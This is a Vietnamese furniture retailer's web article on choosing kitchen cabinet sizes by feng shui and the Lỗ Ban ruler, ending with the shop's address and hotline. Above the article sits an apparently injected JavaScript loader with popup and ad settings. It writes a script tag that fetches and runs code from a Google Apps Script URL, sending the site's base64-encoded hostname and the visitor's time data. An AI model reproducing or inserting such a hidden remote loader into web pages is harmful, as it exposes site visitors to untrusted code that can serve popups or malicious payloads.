var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tư vấn chọn kích thước tủ bếp theo phong thủy

Nhà bếp là một trong những không gian đặc biệt quan trọng với bất kỳ ngôi nhà nào. Tủ bếp là món đồ quan trọng nhất trong không gian này khi chúng định hình toàn bộ căn phòng cũng như quyết định đến không gian sinh hoạt. Khi lựa chọn tủ bếp cần chú ý để có được mẫu tủ đẹp nhất. Việc chọn kích thước tủ bếp theo phong thủy sẽ là một yếu tố không nên bỏ qua để có không gian đẹp cũng như mang lại may mắn cho gia đình mình. Cùng tham khảo những gợi ý qua bài viết sau của Nội Thất Xinh nhé.

Vì sao cần phải chọn kích thước tủ bếp theo phong thủy?

Trước hết, cần chọn kích thước tủ bếp theo phong thủy để giúp có được mẫu tủ bếp vừa vặn và đẹp nhất. Yếu tố đầu tiên cần chú ý khi chọn tủ bếp đó là chúng phải vừa trong phòng bếp để có được không gian cân đối cũng như mang đến sự thuận tiện cho các thành viên gia đình khi sinh hoạt. Khi chọn kích thước này các bạn sẽ có được mẫu tủ đẹp cũng như dễ dàng bày trí trong không gian nhất.

kích thước tủ bếp theo phong thủy

Tủ bếp vừa vặn trong không gian


Kích thước tủ bếp hợp phong thủy cũng trên cở sở tính toán phù hợp để mang đến sự thoải mái nhất cho các thành viên trong gia đình khi sinh hoạt. Đầu tiên,chúng đảm bảo kích thước vừa vặn để bố trí hài hòa trong không gian cũng như trong tổng thể thiết kế nội thất của căn nhà. Thứ hai, tủ bếp có kích thước vừa vặn giúp mang đến việc dễ dàng khi nấu nướng – chức năng chính của tủ bếp với chiều cao cũng như khoảng không gian phù hợp.

Trong thiết kế nội thất, phong thủy luôn là yếu tố được đặc biệt chú ý để mang đến may mắn, tài lộc cho gia đình. Việc chọn kích thước tủ bếp theo phong thủy cũng sẽ giúp mang lại những điều may cho gia đình bạn, đặc biệt là hòa khí gia đình. Khi nhà bếp là không gian các thành viên gia đình quây quần với nhau.

kích thước tủ bếp theo phong thủy

Kích thước tủ bếp vừa vặn cho không gian

Hướng dẫn chọn kích thước tủ bếp theo phong thủy

Khi chọn kích thước tủ bếp theo phong thủy thì thước Lỗ Ban được dùng làm “hệ quy chiếu” để giúp các bạn lựa chọn tủ bếp tốt nhất. Các bạn có thể căn cứ vào các thông số của loại thước này để chọn được kích thước phù hợp nhất cho mẫu tủ bếp nhà mình.

kích thước tủ bếp theo phong thủy

Thước lỗ ban được dùng để chọn kích thước tủ bếp


Việc chọn kích thước tủ bếp theo phong thủy dựa trên thước Lỗ Ban còn có thể kết hợp cùng với lý luận của Chu Kinh Dịch để chọn được kích thước vừa vặn cũng như cân đối nhất cho mẫu tủ bếp nhà bạn.

Trong quy định của thước Lỗ Ban thì kích thước tủ bếp theo phong thủy như sau:

Kích thước tủ bếp dưới: khi chọn kích thước tủ bếp dưới bạn cần tính chiều cao của tủ bếp dưới từ nền nhà đến mặt đá bàn bếp. Theo các chỉ số của thước lỗ ban thì 81cm sẽ là đẹp nhất, và bạn có thể linh động từ 80cm -85cm để phù hợp với người phụ nữ gia đình khi sử. Chiều rộng từ 55cm-65cm sẽ tạo được sự cân đối chung.

Kích thước tủ bếp trên cao: chiều cao kệ bếp trên cao nên khoảng từ 70cm – 72cm và chiều sâu từ 33cm -35 cm là phù hợp.

Một thông số khi chọn kích thước tủ bếp theo phong thủy cần lưu ý đó là khoảng cách giữa tủ bếp dưới và kệ trên cao. Khoảng cách 45cm-60cm sẽ là phù hợp nhất để tạo sự thuận tiện trong quá trình sịnh hoạt. Tổng chiều cao cả cả kệ bếp dưới và kệ bếp trên tối đa 2,5m.

kích thước tủ bếp theo phong thủy

Chọn mẫu tủ bếp có kích thước vừa vặn cho không gian


Khi chọn kích thước tủ bếp theo phong thủy cũng cần phải chú ý đến việc tạo được không gian đi lại trong nhà bếp. 76cm là kích thước tối thiểu chiều rộng lối đi lại cần phải có khi đặt tủ bếp để có được sự thoải mái cho các thành viên gia đình trong quá trình di chuyển và sinh hoạt.

Để chọn được kích thước tủ bếp theo phong thủy không phải là điều quá khó khăn nếu như các bạn có kinh nghiệm cũng như nhận được sự tư vấn tốt nhất. Hãy tìm đến những địa chỉ bán tủ bếp chuyên nghiệp cùng với đó là chất lượng tốt nhất để nhận được sự tư vấn.

Nội Thất Xinh hiện đang là địa chỉ bán tủ bếp đẹp, chất lượng được nhiều gia đình tin tưởng và lựa chọn hiện nay. Chúng tôi nhiều mẫu cho khách hàng lựa chọn cũng như có đảm bảo chất lượng tốt nhất. Đến ngay số 321 Trường Chinh – Thanh Xuân hoặc liên hệ hotline 0975.90.3333 để được tư vấn cụ thể nhé.